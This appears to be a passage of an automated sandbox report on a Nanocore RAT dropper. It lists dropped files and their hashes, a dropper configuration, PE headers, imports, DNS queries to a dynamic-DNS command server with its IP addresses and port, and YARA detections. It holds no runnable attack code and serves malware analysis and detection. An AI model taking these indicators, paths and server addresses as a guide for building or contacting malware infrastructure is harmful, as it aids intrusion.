            Preview: S73keXb4MhWV39e75s3x452LfWT2u4T00tB5EiF6R38jo289k0k4Y8pk4Uw5qn2497a2M540Jz..612MtO598IGcFo0y9d558772GhO6PHr24Q2Y48w33Mz7932fc74c76y36oA74Rk3L120w23WI81631556601PNV502N6Ln494f5KjTb55F637h..0643Ga9NV2IN2Vz66jk858H82552yURFUjm23FJI96jH9m04iaGy55X7..FeWITCl935J1N1d19qn3Z0q3420314p7Z3r6764..UFE300I48Zv30948Y4vt221s4871NoUL9Y9w3P5499EeIfmRU5LfR27megTLUK18Bc537810M7K46mY57be60VAt8H5..49942ijPk049gf812mZ012dLV9jeCIgkFsSZbR0x4Y0O03Fko6o3C6X751YVp8CfL15DPA1P2070080677eJ252YK435eiW6Qj..4iK20..67h06700N2i01ND19A4969686CAMOHLGqPVyry5028D80353aPi69V9j76VPWA57B5Bn710p4F03poJsOIlWth088OQ41j9Y73F5m6J8x9RSEjA2Kq8374999Q7016wnK9Dg48o1lu9lXCxKD8L93153qX02qf880cHdcqH6e1B6a6653jlW2z..
            C:\Users\user\AppData\Roaming\98025414\vrmksemwed.exe
            Process:C:\Users\user\Desktop\ameHrrFwNp.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):501
            Entropy (8bit):5.489232019943575
            Encrypted:false
            SSDEEP:
            MD5:219895927D4CC80B6D14975F461D3404
            SHA1:DDBD21228FC6EFD4E9B13785E5B23F58C491A0F7
            SHA-256:4F70F361AE4100A16FC25DD630145FBC9DA3B81007D861DE4E7DEAF216EF4295
            SHA-512:2858C479987F178F030D60AA92B2B3111ED577EF6AB3817769156DC1FD819D9D6230452BFD6C27E49E133CB47ECE63906832A4C6B94F948D9940D3DFF7B89C77
            Malicious:false
            Reputation:unknown
            Preview: 5365578BD7Q3Su0U34xT7974QG526B4fQnA522MCn4V8z61t6..p4sfQo839542ca6Ytz95073961SrIIz8N775..0W1c9YTBo4gaESAQ54WU7110731d1l3T2AO06T69fo29gl5B2X7f2M8Idi5LhvtnYG038Y9y0X9qE172b1..h82KVs4Oh3tD77V51Ja6P2E51SZ1020L7q900wt25N26a919417Mnkg6r23h3LbD6LBU39w50..ZjaVfMmOaf80hcj7HNrWTRJ0Ig2Hekvv0SH0..0tDcd2126RCf289ihe0466a56369rX7V713K6R5P2695T64n27FxnB8W4N09zewax4J367bDoPltP2f45y91E1g4aU03f3K4cuU3nz34Om19js210G910X23..1u9I4t78G8hVq48W4I55f54K05RnXeb7875741K76R50de7y286522RVuG81I9H4yLW64383z5pK48c2l993C2Ap479..
            C:\Users\user\AppData\Roaming\98025414\vrxipgjwdt.bmp
            Process:C:\Users\user\Desktop\ameHrrFwNp.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):504
            Entropy (8bit):5.456361205166428
            Encrypted:false
            SSDEEP:
            MD5:F44351B6BD604752BC14594FA4F52AD7
            SHA1:517F43BBBC91A655486C2E5722C92531E5B0EF50
            SHA-256:73D4587E93D12CBDF2A50E9C025B61D32390D0313F150C816CF7BB05C1E0BF09
            SHA-512:A160784736AC0257CD4154922FA572E2D5877835B89A6895FF11320D3D74DEAB4135DC90EE23FF762701FC86D86AC615D283747C2959357D358C9022CEE40D4A
            Malicious:false
            Reputation:unknown
            Preview: 8Eo5Qp0K7KC37U5HtS3PnpdmC2D4yb831j5d95036M9o0KVL4T39arHM1ya1n58a2613FPe109X9161LY0OV9Gat41Eo0d8mTm6if06YbA40..deDfMq32542u9b24nGyz541d77Y4p9847ydM3TWf4K..3tUkx0MgT39pyNO13792ug26yvPEDsa095KxV9Al3b3tl45157j26C..g86drBI95Db18IO689Q719U7s8960D83BKqHsWC340DWawb8516u1b339566925ybEUy0BJt840o6YM57H52oH04M4O2188259q8M0ay89316fWVai33Qy8B4ify0dz7M50H0fzukJM0435b3l..22985vN2J4oH42fP5s770V6568r2r59R502P5vv9787..39436cw2OD6k34688V3Qtf858ZcM859x0728xVe7803g1WcTLUi0cji7y4LMKFR648h59l9350SpJrj05BFC8w340K5M5wMfesD..
            C:\Users\user\AppData\Roaming\98025414\vtvpu.log
            Process:C:\Users\user\Desktop\ameHrrFwNp.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):502
            Entropy (8bit):5.503797988329663
            Encrypted:false
            SSDEEP:
            MD5:E0D2C5AD21C810301A3136E0157E6DD6
            SHA1:9BFF387143948E49D09D8BF252BBC5694FDB9D1E
            SHA-256:2168C5FDF28545AE869775600825C77EF04BFE80F658CC1255224D58129FA051
            SHA-512:E03508B3282075D70B95858A0475361CBAC93F6A644B0B155C74E25239D33C699195EFFC22CA3E6B682E7163269439263210FA8494CC16315EE92787951BA37D
            Malicious:false
            Reputation:unknown
            Preview: 1F563i6R1W9R7D324..K173e99x9i8X6A59ZZqp3..Pzq5pCGQNT2m2a7x2RUl0Z2ET67N57S9M8njW63240r..3442Ed9kh02MT40Qk3714vOL38n4k4pzt70613WvzXTp10V377U15z5yBNZDI17Nq0x7k58xvc3A78zC16j05x7P586K93I..D3287S4W43k27vQ11zOockjBPg9qzFlG4NucpTuRJO39hy89M718tScNh5242F0nEn1N82wZma34WElX4C1ZHKc0lv79K4N6c..BUiG5GN571301VI7R9ca03o7F1132Z9oKKzVbW62u4h43900jS94565038wLL99T5694ccN5A7iwY61qzU68t5E6x87150F..2i2xFZP215f32A1Gz9o8N836f9r55K..i6YXdwVA7Dq4ggbfpQM7q007L2P3D73X5Y9P3CQO7WR0904A39WN51d157Wx714xNq256vvE1714yIs551w8co3f..
            C:\Users\user\AppData\Roaming\98025414\wqpf.dll
            Process:C:\Users\user\Desktop\ameHrrFwNp.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):589
            Entropy (8bit):5.444720181233763
            Encrypted:false
            SSDEEP:
            MD5:344250623AC0BA8B7225B5D6A90F3724
            SHA1:A1C3AEBCE08F3F950FF0FC7834897D7E18944C4B
            SHA-256:41B6EBEF5FFF31F33DBBCD71B34ED67443D6B2E9A1AB483D2D6F21925FA9E34A
            SHA-512:0E2C7E81F9A54197805723D3DAD2057BB5607E3EBBBE290651C773F820CA0657696DEBF8F92FD7EB8AF2A6D74D3332B8DF79587671805C50C24D372A7538E101
            Malicious:false
            Reputation:unknown
            Preview: 9C74ey5wL32uaD08017685v8uGqZtRI0e04F229T4Q662V5IFrr559s0363UBKaQE2CZt0j89482366fs455r9r1n7d18lV89i9q6K59m1DB79MrAs0O72vrU7l86J88lO1CH92ga4q1..kMH7cdk38nb0Sve967WGbJ4i04EiUW105e80F71vAKA..01095f8rZ9i36K833S7552z7W4Ia3FdS6x973Y5qMTglhhrdykXTPx2q1IX0ly1pbLFnH66u9Nc622G3tdC336208B1Oa9Ng7z0a423607154JYoxUcaU..S1318227f..9V72M33yB24me61794HsX1Uwn528f554..0H9R523cTOBG0804UW48a2057Vch3..eq98keW97G7424hZsuXO6QrE2epSt178nEo60F7B7H919564LO0fx9q3cl83M0567Y5u80L4Kf3687RRN2sy584j6074Ym..Q7O6g032q6lI..9M75t31tt8qk18841387936JSY03JH6K076e8Fec311y891S5w2mt18F08i19455dQ6445EU0119K19Eg9FI49489J86637..
            C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
            Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
            File Type:Non-ISO extended-ASCII text, with no line terminators
            Category:dropped
            Size (bytes):8
            Entropy (8bit):3.0
            Encrypted:false
            SSDEEP:
            MD5:BD8766BA1722A2A636D519BB2B64FC26
            SHA1:48F583F5ADE38ADC3E34A726F9AD3EFF6B3C7BF8
            SHA-256:FF3B6D253DCE757D1D4C4EFBB47322BE3FE9E9DC4F383AFBF6ED320F4355ECDB
            SHA-512:7D606ACBD66C7305B53A88762CEACEAEEC5E49875FCD7816E2DC7476110E015A5EC94586BA407E30604BF739EF7896FB1437E864E4F9623984B89EE8DC763BF2
            Malicious:true
            Reputation:unknown
            Preview: .*..}..H
            C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
            Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):45
            Entropy (8bit):4.4112044189276585
            Encrypted:false
            SSDEEP:
            MD5:4879007AC97C3DF41896D937852ABBE7
            SHA1:05A8C8638A4C8157216EF4AE24B43D3A4E750F00
            SHA-256:18B03E2D9F5F5E7E26686848D71049AC56D06500A2AB420A3A01CA0ED6C7AD18
            SHA-512:03C80EC22591301B32EB0310A188B1C4C24DC16BF9E2E25B22A95AA6E36E9B7002196B13A522F36D9AC64C38A98D6BA06C3387DBBE7CB3319E45BC43359A6C43
            Malicious:false
            Reputation:unknown
            Preview: C:\Users\user\AppData\Local\Temp\RegSvcs.exe
            C:\Users\user\temp\owxpr.pdf
            Process:C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):81
            Entropy (8bit):5.107152824712226
            Encrypted:false
            SSDEEP:
            MD5:980CF6AB3F834CAADC71AFDC5FE23036
            SHA1:9D30B5465D73385F2D8D26D0D8AFD928F8F499DC
            SHA-256:949B481B9C161702F6A85DFA8646C9BCB465935BE68FC5DACA072205A3057C46
            SHA-512:114132750DE9BF5F4AF871D4A72D41115A7DBBA4964B2376B6BD3B6FC8C5224A93AD506E419EC903844AA48C86E41C7882FF6CD2C3E79C9C75E8E1CA8E773266
            Malicious:false
            Reputation:unknown
            Preview: [S3tt!ng]..stpth=%appdata%..Key=Chrome..Dir3ctory=98025414..ExE_c=bspmflqee.pif..
            \Device\ConDrv
            Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1141
            Entropy (8bit):4.44831826838854
            Encrypted:false
            SSDEEP:
            MD5:1AEB3A784552CFD2AEDEDC1D43A97A4F
            SHA1:804286AB9F8B3DE053222826A69A7CDA3492411A
            SHA-256:0BC438F4B1208E1390C12D375B6CBB08BF47599D1F24BD07799BB1DF384AA293
            SHA-512:5305059BA86D5C2185E590EC036044B2A17ED9FD9863C2E3C7E7D8035EF0C79E53357AF5AE735F7D432BC70156D4BD3ACB42D100CFB05C2FB669EA22368F1415
            Malicious:false
            Reputation:unknown
            Preview: Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):7.829741962910898
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:ameHrrFwNp.exe
            File size:1068179
            MD5:1f221e6e2a07d553e3fcf5bdb5874b2e
            SHA1:0cd7541409f63dda3781d18c61bdcd74782192e6
            SHA256:2d2f62269797be7ef763ac2da37e4c190381cfba8798e92e73ee9aa2084386f1
            SHA512:6ba7d89395d226a8d11ade5be491d5d98ab7d64c4d27d8ccab284bbdd007bb9d97cd13c21010d2f54a05c75da7af349c79ddd00f16671016daaa5c4da1b6be63
            SSDEEP:24576:rAOcZEh4lkCwJlOZIafXiba6TPY5I7nT1RMwazk:t6SCuKfXb6c5IzTXM7I
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'..

            File Icon

            Icon Hash:b491b4ecd336fb5b

            Static PE Info

            General

            Entrypoint:0x41e1f9
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
            DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Time Stamp:0x5E7C7DC7 [Thu Mar 26 10:02:47 2020 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:1
            File Version Major:5
            File Version Minor:1
            Subsystem Version Major:5
            Subsystem Version Minor:1
            Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

            Entrypoint Preview

            Instruction
            call 00007F6670B7BF5Fh
            jmp 00007F6670B7B953h
            cmp ecx, dword ptr [0043D668h]
            jne 00007F6670B7BAC5h
            ret
            jmp 00007F6670B7C0D5h
            ret
            and dword ptr [ecx+04h], 00000000h
            mov eax, ecx
            and dword ptr [ecx+08h], 00000000h
            mov dword ptr [ecx+04h], 00433068h
            mov dword ptr [ecx], 00434284h
            ret
            push ebp
            mov ebp, esp
            push esi
            push dword ptr [ebp+08h]
            mov esi, ecx
            call 00007F6670B6EED1h
            mov dword ptr [esi], 00434290h
            mov eax, esi
            pop esi
            pop ebp
            retn 0004h
            and dword ptr [ecx+04h], 00000000h
            mov eax, ecx
            and dword ptr [ecx+08h], 00000000h
            mov dword ptr [ecx+04h], 00434298h
            mov dword ptr [ecx], 00434290h
            ret
            lea eax, dword ptr [ecx+04h]
            mov dword ptr [ecx], 00434278h
            push eax
            call 00007F6670B7EC6Dh
            pop ecx
            ret
            push ebp
            mov ebp, esp
            push esi
            mov esi, ecx
            lea eax, dword ptr [esi+04h]
            mov dword ptr [esi], 00434278h
            push eax
            call 00007F6670B7EC56h
            test byte ptr [ebp+08h], 00000001h
            pop ecx
            je 00007F6670B7BACCh
            push 0000000Ch
            push esi
            call 00007F6670B7B08Fh
            pop ecx
            pop ecx
            mov eax, esi
            pop esi
            pop ebp
            retn 0004h
            push ebp
            mov ebp, esp
            sub esp, 0Ch
            lea ecx, dword ptr [ebp-0Ch]
            call 00007F6670B7BA2Eh
            push 0043A410h
            lea eax, dword ptr [ebp-0Ch]
            push eax
            call 00007F6670B7E355h
            int3
            push ebp
            mov ebp, esp
            sub esp, 0Ch

            Rich Headers

            Programming Language:
            • [ C ] VS2008 SP1 build 30729
            • [EXP] VS2015 UPD3.1 build 24215
            • [LNK] VS2015 UPD3.1 build 24215
            • [IMP] VS2008 SP1 build 30729
            • [C++] VS2015 UPD3.1 build 24215
            • [RES] VS2015 UPD3 build 24213

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x3b5400x34.rdata
            IMAGE_DIRECTORY_ENTRY_IMPORT0x3b5740x3c.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x4c28.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x670000x210c.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x397d00x54.rdata
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x342180x40.rdata
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x320000x260.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3aaec0x120.rdata
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x305810x30600False0.589268410853data6.70021125825IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            .rdata0x320000xa3320xa400False0.455030487805data5.23888424127IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0x3d0000x238b00x1200False0.368272569444data3.83993526939IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
            .gfids0x610000xe80x200False0.333984375data2.12166381533IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .rsrc0x620000x4c280x4e00False0.602263621795data6.36874241417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0x670000x210c0x2200False0.786534926471data6.61038519378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountry
            PNG0x625240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States
            PNG0x6306c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States
            RT_ICON0x646180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 134243974, next used block 1626799870
            RT_DIALOG0x649000x286dataEnglishUnited States
            RT_DIALOG0x64b880x13adataEnglishUnited States
            RT_DIALOG0x64cc40xecdataEnglishUnited States
            RT_DIALOG0x64db00x12edataEnglishUnited States
            RT_DIALOG0x64ee00x338dataEnglishUnited States
            RT_DIALOG0x652180x252dataEnglishUnited States
            RT_STRING0x6546c0x1e2dataEnglishUnited States
            RT_STRING0x656500x1ccdataEnglishUnited States
            RT_STRING0x6581c0x1b8dataEnglishUnited States
            RT_STRING0x659d40x146Hitachi SH big-endian COFF object file, not stripped, 17152 sections, symbol offset=0x73006500EnglishUnited States
            RT_STRING0x65b1c0x446dataEnglishUnited States
            RT_STRING0x65f640x166dataEnglishUnited States
            RT_STRING0x660cc0x152dataEnglishUnited States
            RT_STRING0x662200x10adataEnglishUnited States
            RT_STRING0x6632c0xbcdataEnglishUnited States
            RT_STRING0x663e80xd6dataEnglishUnited States
            RT_GROUP_ICON0x664c00x14data
            RT_MANIFEST0x664d40x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

            Imports

            DLLImport
            KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
            gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States

            Network Behavior

            Snort IDS Alerts

            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
            10/13/21-12:16:31.658754UDP254DNS SPOOF query response with TTL of 1 min. and no authority53521308.8.8.8192.168.2.3
            10/13/21-12:17:07.382116UDP254DNS SPOOF query response with TTL of 1 min. and no authority53507288.8.8.8192.168.2.3

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Oct 13, 2021 12:16:31.719916105 CEST4977648562192.168.2.3197.210.54.24
            Oct 13, 2021 12:16:34.786353111 CEST4977648562192.168.2.3197.210.54.24
            Oct 13, 2021 12:16:40.786834955 CEST4977648562192.168.2.3197.210.54.24
            Oct 13, 2021 12:16:49.954205990 CEST4979248562192.168.2.3197.210.54.24
            Oct 13, 2021 12:16:52.959737062 CEST4979248562192.168.2.3197.210.54.24
            Oct 13, 2021 12:16:59.008208036 CEST4979248562192.168.2.3197.210.54.24
            Oct 13, 2021 12:17:07.385251045 CEST4980048562192.168.2.3197.210.54.24
            Oct 13, 2021 12:17:10.414437056 CEST4980048562192.168.2.3197.210.54.24
            Oct 13, 2021 12:17:12.820462942 CEST4856249800197.210.54.24192.168.2.3
            Oct 13, 2021 12:17:13.336638927 CEST4980048562192.168.2.3197.210.54.24
            Oct 13, 2021 12:17:14.077867985 CEST4856249800197.210.54.24192.168.2.3
            Oct 13, 2021 12:17:18.104386091 CEST4980248562192.168.2.3185.19.85.175
            Oct 13, 2021 12:17:20.410979033 CEST4856249802185.19.85.175192.168.2.3
            Oct 13, 2021 12:17:20.946707010 CEST4980248562192.168.2.3185.19.85.175
            Oct 13, 2021 12:17:21.216617107 CEST4856249802185.19.85.175192.168.2.3
            Oct 13, 2021 12:17:21.744015932 CEST4980248562192.168.2.3185.19.85.175
            Oct 13, 2021 12:17:21.988389969 CEST4856249802185.19.85.175192.168.2.3
            Oct 13, 2021 12:17:25.996124983 CEST4980548562192.168.2.3185.19.85.175
            Oct 13, 2021 12:17:26.238938093 CEST4856249805185.19.85.175192.168.2.3
            Oct 13, 2021 12:17:26.743843079 CEST4980548562192.168.2.3185.19.85.175
            Oct 13, 2021 12:17:26.956526995 CEST4856249805185.19.85.175192.168.2.3
            Oct 13, 2021 12:17:27.650228024 CEST4980548562192.168.2.3185.19.85.175
            Oct 13, 2021 12:17:27.912931919 CEST4856249805185.19.85.175192.168.2.3
            Oct 13, 2021 12:17:32.022396088 CEST4980648562192.168.2.3185.19.85.175
            Oct 13, 2021 12:17:35.026699066 CEST4980648562192.168.2.3185.19.85.175
            Oct 13, 2021 12:17:35.318099022 CEST4856249806185.19.85.175192.168.2.3
            Oct 13, 2021 12:17:35.831594944 CEST4980648562192.168.2.3185.19.85.175
            Oct 13, 2021 12:17:36.056482077 CEST4856249806185.19.85.175192.168.2.3
            Oct 13, 2021 12:17:40.332600117 CEST4980748562192.168.2.3197.210.54.24
            Oct 13, 2021 12:17:43.345541000 CEST4980748562192.168.2.3197.210.54.24
            Oct 13, 2021 12:17:45.743858099 CEST4856249807197.210.54.24192.168.2.3
            Oct 13, 2021 12:17:46.252052069 CEST4980748562192.168.2.3197.210.54.24
            Oct 13, 2021 12:17:47.145857096 CEST4856249807197.210.54.24192.168.2.3
            Oct 13, 2021 12:17:51.181116104 CEST4981948562192.168.2.3197.210.54.24
            Oct 13, 2021 12:17:54.206706047 CEST4981948562192.168.2.3197.210.54.24

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Oct 13, 2021 12:16:31.639177084 CEST5213053192.168.2.38.8.8.8
            Oct 13, 2021 12:16:31.658754110 CEST53521308.8.8.8192.168.2.3
            Oct 13, 2021 12:16:49.931766033 CEST6329753192.168.2.38.8.8.8
            Oct 13, 2021 12:16:49.950122118 CEST53632978.8.8.8192.168.2.3
            Oct 13, 2021 12:17:07.362140894 CEST5072853192.168.2.38.8.8.8
            Oct 13, 2021 12:17:07.382116079 CEST53507288.8.8.8192.168.2.3
            Oct 13, 2021 12:17:40.308571100 CEST5677353192.168.2.38.8.8.8
            Oct 13, 2021 12:17:40.326713085 CEST53567738.8.8.8192.168.2.3
            Oct 13, 2021 12:17:51.160240889 CEST6443253192.168.2.38.8.8.8
            Oct 13, 2021 12:17:51.180282116 CEST53644328.8.8.8192.168.2.3

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
            Oct 13, 2021 12:16:31.639177084 CEST192.168.2.38.8.8.80xae48Standard query (0)strongodss.ddns.netA (IP address)IN (0x0001)
            Oct 13, 2021 12:16:49.931766033 CEST192.168.2.38.8.8.80x6faStandard query (0)strongodss.ddns.netA (IP address)IN (0x0001)
            Oct 13, 2021 12:17:07.362140894 CEST192.168.2.38.8.8.80x6e23Standard query (0)strongodss.ddns.netA (IP address)IN (0x0001)
            Oct 13, 2021 12:17:40.308571100 CEST192.168.2.38.8.8.80x2318Standard query (0)strongodss.ddns.netA (IP address)IN (0x0001)
            Oct 13, 2021 12:17:51.160240889 CEST192.168.2.38.8.8.80xd40eStandard query (0)strongodss.ddns.netA (IP address)IN (0x0001)

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
            Oct 13, 2021 12:16:31.658754110 CEST8.8.8.8192.168.2.30xae48No error (0)strongodss.ddns.net197.210.54.24A (IP address)IN (0x0001)
            Oct 13, 2021 12:16:49.950122118 CEST8.8.8.8192.168.2.30x6faNo error (0)strongodss.ddns.net197.210.54.24A (IP address)IN (0x0001)
            Oct 13, 2021 12:17:07.382116079 CEST8.8.8.8192.168.2.30x6e23No error (0)strongodss.ddns.net197.210.54.24A (IP address)IN (0x0001)
            Oct 13, 2021 12:17:40.326713085 CEST8.8.8.8192.168.2.30x2318No error (0)strongodss.ddns.net197.210.54.24A (IP address)IN (0x0001)
            Oct 13, 2021 12:17:51.180282116 CEST8.8.8.8192.168.2.30xd40eNo error (0)strongodss.ddns.net197.210.54.24A (IP address)IN (0x0001)

            Code Manipulations

            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            Analysis Process: ameHrrFwNp.exe PID: 5216 Parent PID: 5092

            General

            Start time:12:15:37
            Start date:13/10/2021
            Path:C:\Users\user\Desktop\ameHrrFwNp.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Desktop\ameHrrFwNp.exe'
            Imagebase:0xd70000
            File size:1068179 bytes
            MD5 hash:1F221E6E2A07D553E3FCF5BDB5874B2E
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low

            Chronological Activities

            Analysis Process: bspmflqee.pif PID: 3836 Parent PID: 5216

            General

            Start time:12:16:13
            Start date:13/10/2021
            Path:C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif' ewdsxu.ije
            Imagebase:0xf90000
            File size:777456 bytes
            MD5 hash:8E699954F6B5D64683412CC560938507
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.386724490.00000000042F6000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.386724490.00000000042F6000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.386724490.00000000042F6000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.386483303.0000000004393000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.386483303.0000000004393000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.386483303.0000000004393000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
